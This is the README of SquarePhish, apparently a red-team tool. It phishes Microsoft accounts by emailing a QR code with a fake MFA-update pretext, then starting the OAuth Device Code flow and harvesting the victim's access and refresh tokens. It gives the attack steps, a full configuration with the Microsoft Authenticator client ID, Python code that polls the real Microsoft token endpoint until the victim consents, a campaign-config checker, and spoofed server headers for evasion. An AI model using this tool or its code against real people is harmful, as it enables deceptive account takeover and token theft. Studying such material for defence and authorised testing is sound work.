SquarePhish

SquarePhish is a phishing tool that combines the OAuth 2.0 Device Code authentication flow with QR codes: the QR code lures the victim to an attacker-controlled server, and only then is the device code flow started against Microsoft.

See PhishInSuits for more details on using OAuth Device Code flow for phishing attacks.


   _____                            _____  _     _     _     
  / ____|                          |  __ \| |   (_)   | |    
 | (___   __ _ _   _  __ _ _ __ ___| |__) | |__  _ ___| |__  
  \___ \ / _` | | | |/ _` | '__/ _ \  ___/| '_ \| / __| '_ \ 
  ____) | (_| | |_| | (_| | | |  __/ |    | | | | \__ \ | | |
 |_____/ \__, |\__,_|\__,_|_|  \___|_|    |_| |_|_|___/_| |_|
            | |                                              
            |_|                                            
                     _________
                    |         | /(
                    | O       |/ (
                    |>        |\ (  v0.1.0
                    |_________| \(

usage: squish.py [-h] {email,server} ...

SquarePhish -- v0.1.0

optional arguments:
  -h, --help      show this help message and exit

modules:
  {email,server}
    email         send a malicious QR Code email to a provided victim
    server        host a malicious server QR Codes generated via the 'email' module will 
                  point to that will activate the malicious OAuth Device Code flow

Attack Steps

An attacker can use the email module of SquarePhish to send a malicious QR code email to a victim. The default pretext is that the victim must update their Microsoft MFA settings to keep using email on their mobile device. The client ID used by default is that of the Microsoft Authenticator app (see CLIENT_ID in the SERVER section of settings.config).

By sending a QR code first instead of a device code, the attacker avoids starting the OAuth Device Code flow prematurely: a device code is only valid for 15 minutes, so it is not requested until the victim has actually scanned the lure.

The victim then scans the QR code in the email body with their mobile device. The QR code points at the attacker-controlled server (running the server module of SquarePhish), with a URL parameter set to the victim's email address so the server knows whom to send the device code to.

When the victim visits the SquarePhish server, a background process starts the OAuth Device Code flow (this is the moment the 15 minute device code timer begins) and emails the victim the generated device code, which they are asked to enter on the legitimate Microsoft Device Code website.

The SquarePhish server will then continue to poll for authentication in the background.

[2022-04-08 14:31:51,962] [info] [[email protected]] Polling for user authentication...
[2022-04-08 14:31:57,185] [info] [[email protected]] Polling for user authentication...
[2022-04-08 14:32:02,372] [info] [[email protected]] Polling for user authentication...
[2022-04-08 14:32:07,516] [info] [[email protected]] Polling for user authentication...
[2022-04-08 14:32:12,847] [info] [[email protected]] Polling for user authentication...
[2022-04-08 14:32:17,993] [info] [[email protected]] Polling for user authentication...
[2022-04-08 14:32:23,169] [info] [[email protected]] Polling for user authentication...
[2022-04-08 14:32:28,492] [info] [[email protected]] Polling for user authentication...

The victim then visits the Microsoft Device Code authentication site, either via the link in the device code email or via the redirect served by the SquarePhish URL on their mobile device.

The victim will then enter the provided Device Code and will be prompted for consent.

After the victim authenticates and consents, the token response is saved locally and grants the attacker access within the scope requested by the application.

[2022-04-08 14:32:28,796] [info] [[email protected]] Token info saved to [email protected]

The current scope definition:

"scope": ".default offline_access profile openid"
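The attack steps above are one pass through the OAuth 2.0 Device Authorization Grant (RFC 8628). The following is an added example, not SquarePhish's own code, showing the two requests the server module has to make against the Microsoft identity platform and the polling rules the flow requires (keep polling on authorization_pending, back off on slow_down, give up on expiry or any other error). The HTTP transport is injected, so the block runs offline against a constructed fake of the Microsoft endpoints; the client ID is a placeholder, the endpoint URLs are the real v2.0 ones, and the scope is the page's PERMISSION_SCOPE.

```python
"""Added example (not SquarePhish's own code): the OAuth 2.0 Device Authorization
Grant (RFC 8628) exchange that the server module drives once a victim scans the
lure, with the polling rules the flow requires. The HTTP transport is injected,
so the block runs offline against a constructed fake of the Microsoft endpoints."""
import time
from typing import Callable, Dict, Optional

# Microsoft identity platform v2.0 endpoints (real URLs, 'common' tenant).
DEVICECODE_URL = "https://login.microsoftonline.com/common/oauth2/v2.0/devicecode"
TOKEN_URL = "https://login.microsoftonline.com/common/oauth2/v2.0/token"
DEVICE_GRANT = "urn:ietf:params:oauth:grant-type:device_code"

# Placeholder client ID (assumption); the scope matches the page's PERMISSION_SCOPE.
CLIENT_ID = "00000000-0000-0000-0000-000000000000"
SCOPE = ".default offline_access profile openid"

Post = Callable[[str, Dict[str, str]], Dict]


def device_code_request(client_id: str, scope: str) -> Dict[str, str]:
    """Step 1 form body: ask the authorization server for a device_code/user_code pair."""
    return {"client_id": client_id, "scope": scope}


def token_request(client_id: str, device_code: str) -> Dict[str, str]:
    """Step 2 form body: poll the token endpoint with the device_code (not the user_code)."""
    return {"grant_type": DEVICE_GRANT, "client_id": client_id, "device_code": device_code}


def poll_for_token(post: Post, client_id: str, device_code: str, interval: int,
                   expires_in: int, sleep: Callable[[float], None] = time.sleep,
                   clock: Callable[[], float] = time.monotonic) -> Optional[Dict]:
    """Poll until the victim authorizes, the code expires, or the server says stop.

    RFC 8628 section 3.5: wait `interval` seconds between polls, keep polling on
    authorization_pending, add 5 seconds to the interval on slow_down, and give
    up on any other error (expired_token, authorization_declined, ...).
    """
    deadline = clock() + expires_in
    while clock() < deadline:
        sleep(interval)
        resp = post(TOKEN_URL, token_request(client_id, device_code))
        err = resp.get("error")
        if err is None:
            return resp  # access_token, refresh_token (from offline_access), id_token
        if err == "authorization_pending":
            continue
        if err == "slow_down":
            interval += 5
            continue
        return None
    return None  # device code lifetime (expires_in, 15 minutes for AAD) ran out


def run_flow(post: Post, client_id: str = CLIENT_ID, scope: str = SCOPE,
             sleep: Callable[[float], None] = time.sleep,
             clock: Callable[[], float] = time.monotonic):
    """Drive both steps. Returns (user_code to put in the lure email, token response or None)."""
    dc = post(DEVICECODE_URL, device_code_request(client_id, scope))
    token = poll_for_token(post, client_id, dc["device_code"], dc["interval"],
                           dc["expires_in"], sleep, clock)
    return dc["user_code"], token


class FakeMicrosoftEndpoint:
    """Constructed stand-in for the AAD endpoints; the script lists the token-endpoint
    errors to return in order, with None meaning 'issue the token'."""

    def __init__(self, script=("authorization_pending", "authorization_pending", "slow_down", None)):
        self.script = list(script)
        self.token_calls = 0

    def post(self, url: str, body: Dict[str, str]) -> Dict:
        if url == DEVICECODE_URL:
            return {"device_code": "DC-constructed", "user_code": "ABCD1234",
                    "verification_uri": "https://microsoft.com/devicelogin",
                    "expires_in": 900, "interval": 5}
        if url != TOKEN_URL or body.get("grant_type") != DEVICE_GRANT:
            return {"error": "invalid_request"}
        self.token_calls += 1
        err = self.script[min(self.token_calls, len(self.script)) - 1]
        if err:
            return {"error": err}
        return {"token_type": "Bearer", "access_token": "eyJ.constructed",
                "refresh_token": "0.constructed"}


if __name__ == "__main__":
    ep = FakeMicrosoftEndpoint()
    code, tok = run_flow(ep.post, sleep=lambda _s: None)
    print("user_code:", code, "polls:", ep.token_calls, "token:", tok is not None)
```

Against the real endpoints, `post` would be a function that form-encodes the body and returns the parsed JSON from `requests.post(...)`; everything else stays the same. The `offline_access` scope is what makes the response include a refresh token, which is why the page's default scope asks for it.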

Usage

!IMPORTANT: Before using either module, update the required information in the settings.config file noted with Required.

Email Module

Send the target victim a generated QR code that will trigger the OAuth Device Code flow.

usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL] [-u URL]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

  -e EMAIL, --email EMAIL
                        victim email address to send initial QR code email to

  -u URL, --url URL     force a url to use, this will override the default
                        and will not work with default device flow or
                        pretext but can be useful if using squarephish to
                        send lures directing targets to other servers

Server Module

Host a server that a generated QR code will be pointed to and when requested will trigger the OAuth Device Code flow.

usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

Configuration

All of the applicable settings for execution can be found and modified via the settings.config file. Three settings have no default value and must be filled in: SMTP_EMAIL and SMTP_PASSWORD (both modules) and SQUAREPHISH_SERVER (email module only). Every option is documented with an in-line comment in the settings file.

Note: The SQUAREPHISH_ values present in the 'EMAIL' section of the configuration should match the values set when running the SquarePhish server.

[DEFAULT]
SMTP_PORT            = 465                                                                      # SMTP port, defaulted to 465
SMTP_SERVER          = "smtp.gmail.com"                                                         # SMTP server, defaulted to GMail
SMTP_PROTO           = "ssl"                                                                    # SMTP protocol: {ssl, tls, None (leave empty)}
SMTP_EMAIL           = ""                                                                       # Provide authenticating email address here
SMTP_PASSWORD        = ""                                                                       # Provide authenticating password here

[EMAIL]
SQUAREPHISH_SERVER   = ""                                                                       # Required: Provide IP address/domain name of hosted SquarePhish server
SQUAREPHISH_PORT     = 8443                                                                     # Hosted SquarePhish server port, defaulted to 8443 (this should match the below server value)
SQUAREPHISH_ENDPOINT = "/mfa"                                                                   # Hosted SquarePhish endpoint to trigger OAuth Device Code flow, defaulted to an MFA pretext (this should match the below server value)
FROM_EMAIL           = "[email protected]"                                                     # Default FROM address when sending an email
SUBJECT              = "ACTION REQUIRED: Multi-Factor Authentication (MFA) Update"              # Default SUBJECT when sending an email, defaulted to an MFA pretext
EMAIL_TEMPLATE       = "pretexts/mfa/qrcode_email.html"                                         # Email body template for QR code email to victim

[SERVER]
PORT                 = 8443
FROM_EMAIL           = "[email protected]"                                                     # Default FROM address when sending an email
SUBJECT              = "ACTION REQUIRED: Multi-Factor Authentication (MFA) Update"              # Default SUBJECT when sending an email, defaulted to an MFA pretext
CLIENT_ID            = "4813382a-8fa7-425e-ab75-3b753aab3abb"                                   # Authenticating client ID, defaulted to Microsoft Authenticator App
ENDPOINT             = "/mfa"                                                                   # Hosted endpoint to trigger OAuth Device Code flow, defaulted to an MFA pretext
CERT_CRT             = ""                                                                       # Server SSL certificate .crt file
CERT_KEY             = ""                                                                       # Server SSL certificate .key file
EMAIL_TEMPLATE       = "pretexts/mfa/devicecode_email.html"                                     # Email body template for device code email to victim
PERMISSION_SCOPE     = ".default offline_access profile openid"                                 # OAuth permission scope - https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-permissions-and-consent
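A mismatch between the EMAIL and SERVER sections (the lure pointing at a port or endpoint the server is not listening on) silently breaks the campaign, and a blank required value only fails once a module runs. The following is an added example, not part of SquarePhish, that parses the settings.config format with the standard library and reports those problems up front. The config text below is a constructed, abridged copy with a blank SMTP_PASSWORD and a port mismatch planted on purpose; squish.py's own loader is not shown on this page and may differ.

```python
"""Added example (not part of SquarePhish): parse settings.config with the
standard library and check, before running either module, the required values
and the EMAIL/SERVER consistency the note above describes. The sample config is
a constructed, abridged copy; squish.py's own loader is not shown on the page."""
import configparser
import sys
from typing import List

REQUIRED_DEFAULT = ("SMTP_EMAIL", "SMTP_PASSWORD")
REQUIRED_EMAIL = ("SQUAREPHISH_SERVER",)
# (EMAIL key, SERVER key) pairs that must agree, or the QR code points at the wrong place.
MUST_MATCH = (("SQUAREPHISH_PORT", "PORT"), ("SQUAREPHISH_ENDPOINT", "ENDPOINT"))

SAMPLE_CONFIG = """\
[DEFAULT]
SMTP_PORT            = 465            # SMTP port
SMTP_SERVER          = "smtp.gmail.com"
SMTP_PROTO           = "ssl"          # {ssl, tls, None (leave empty)}
SMTP_EMAIL           = "attacker@example.invalid"
SMTP_PASSWORD        = ""             # left blank on purpose: should be reported

[EMAIL]
SQUAREPHISH_SERVER   = "lure.example.invalid"
SQUAREPHISH_PORT     = 8443
SQUAREPHISH_ENDPOINT = "/mfa"

[SERVER]
PORT                 = 443            # mismatch with SQUAREPHISH_PORT: should be reported
ENDPOINT             = "/mfa"
CLIENT_ID            = "00000000-0000-0000-0000-000000000000"   # placeholder, not the real default
"""


def load_settings(text: str) -> configparser.ConfigParser:
    """settings.config is INI with trailing '#' comments and double-quoted strings."""
    cp = configparser.ConfigParser(inline_comment_prefixes=("#",), interpolation=None)
    cp.optionxform = str  # keep keys upper-case as written in the file
    cp.read_string(text)
    return cp


def setting(cp: configparser.ConfigParser, section: str, key: str) -> str:
    """Fetch a value with its surrounding quotes removed; '' if absent."""
    return cp.get(section, key, fallback="").strip().strip('"')


def validate(cp: configparser.ConfigParser, module: str) -> List[str]:
    """Return the problems found for running `module` ('email' or 'server'); [] means OK."""
    problems = []
    for key in REQUIRED_DEFAULT:
        if not setting(cp, "DEFAULT", key):
            problems.append(f"[DEFAULT] {key} is required")
    proto = setting(cp, "DEFAULT", "SMTP_PROTO").lower()
    if proto not in ("ssl", "tls", ""):
        problems.append(f"[DEFAULT] SMTP_PROTO must be ssl, tls or empty, got {proto!r}")
    if module == "email":
        for key in REQUIRED_EMAIL:
            if not setting(cp, "EMAIL", key):
                problems.append(f"[EMAIL] {key} is required")
        for ekey, skey in MUST_MATCH:
            e, s = setting(cp, "EMAIL", ekey), setting(cp, "SERVER", skey)
            if e != s:
                problems.append(f"[EMAIL] {ekey}={e!r} does not match [SERVER] {skey}={s!r}")
    return problems


if __name__ == "__main__":
    # Pass a path to check a real settings.config; with no argument the sample is checked.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CONFIG
    cfg = load_settings(text)
    for mod in ("email", "server"):
        print(mod, validate(cfg, mod) or "OK")
```

Run it as `python check_settings.py settings.config` before starting either module; an empty list for both modules means the lure URL and the server agree and the SMTP credentials are present.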

Custom Pretexts

Currently, the pre-defined pretexts can be found in the pretexts folder.

To write custom pretexts, use the existing template via the pretexts/iphone/ folder. An email template is required for both the initial QR code email as well as the follow up device code email.

Important: When writing a custom pretext, note the existence of %s in both pretext templates. This exists to allow SquarePhish to populate the correct data when generating emails (QR code data and/or device code value).

OPSEC

There are several HTTP response headers defined in the utils.py file. These headers are defined to override any existing Flask response header values and to provide a more 'legitimate' response from the server. These header values can be modified, removed and/or additional headers can be included for better OPSEC.

{
    "vary": "Accept-Encoding",
    "server": "Microsoft-IIS/10.0",
    "tls_version": "tls1.3",
    "content-type": "text/html; charset=utf-8",
    "x-appversion": "1.0.8125.42964",
    "x-frame-options": "SAMEORIGIN",
    "x-ua-compatible": "IE=Edge;chrome=1",
    "x-xss-protection": "1; mode=block",
    "x-content-type-options": "nosniff",
    "strict-transport-security": "max-age=31536000",
}
